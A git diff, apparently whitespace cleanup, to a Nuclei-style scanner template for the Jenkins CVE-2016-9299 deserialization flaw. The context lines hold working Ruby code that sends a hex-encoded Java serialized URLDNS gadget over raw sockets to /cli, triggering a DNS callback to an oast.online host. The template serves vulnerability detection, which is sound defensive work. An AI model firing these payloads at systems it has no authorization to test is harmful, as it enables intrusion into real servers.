diff --git a/http/cves/2024/CVE-2016-9299.yaml b/http/cves/2024/CVE-2016-9299.yaml index 4006a88a6b..77909ee9e9 100644 --- a/http/cves/2024/CVE-2016-9299.yaml +++ b/http/cves/2024/CVE-2016-9299.yaml @@ -33,9 +33,9 @@ code: require 'base64' # Define environment variables for host details (make sure they are properly set in your environment) - $Hostname = ENV['Hostname'] - $Host = ENV['Host'] - $Port = ENV['Port'] + $Hostname = ENV['Hostname'] + $Host = ENV['Host'] + $Port = ENV['Port'] interactsh = (ENV['oast']).ljust(45,'/') url_dns = "aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74002d657761776a7763737778766b6a66737763716c69316673737632357271306438642e6f6173742e6f6e6c696e6574000071007e0005740004687474707078740034687474703a2f2f657761776a7763737778766b6a66737763716c69316673737632357271306438642e6f6173742e6f6e6c696e6578" $decoded_url_dns = [url_dns].pack("H*") @@ -44,7 +44,7 @@ code: # Step 1: Send the download request without waiting for a response or closing the socket def send_download_request(host, port) download_socket = TCPSocket.new(host, port) - + download_request = <<~REQ POST /cli HTTP/1.1 Host: #{$Hostname} @@ -53,7 +53,7 @@ code: Content-Type: application/x-www-form-urlencoded Content-Length: 0\r\n REQ - + #puts "Sending Download Request..." download_socket.write(download_request) @@ -64,7 +64,7 @@ code: # Step 2: Send the upload request def send_upload_request(host, port) socket = TCPSocket.new(host, port) - + # Base64 decoded payload for upload request chunked_payload = "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\x01\x55" + $decoded_url_dns @@ -79,7 +79,7 @@ code: #puts "Sending Upload Request..." socket.write(upload_request) - + # Send the binary data (payload) socket.write(chunked_payload)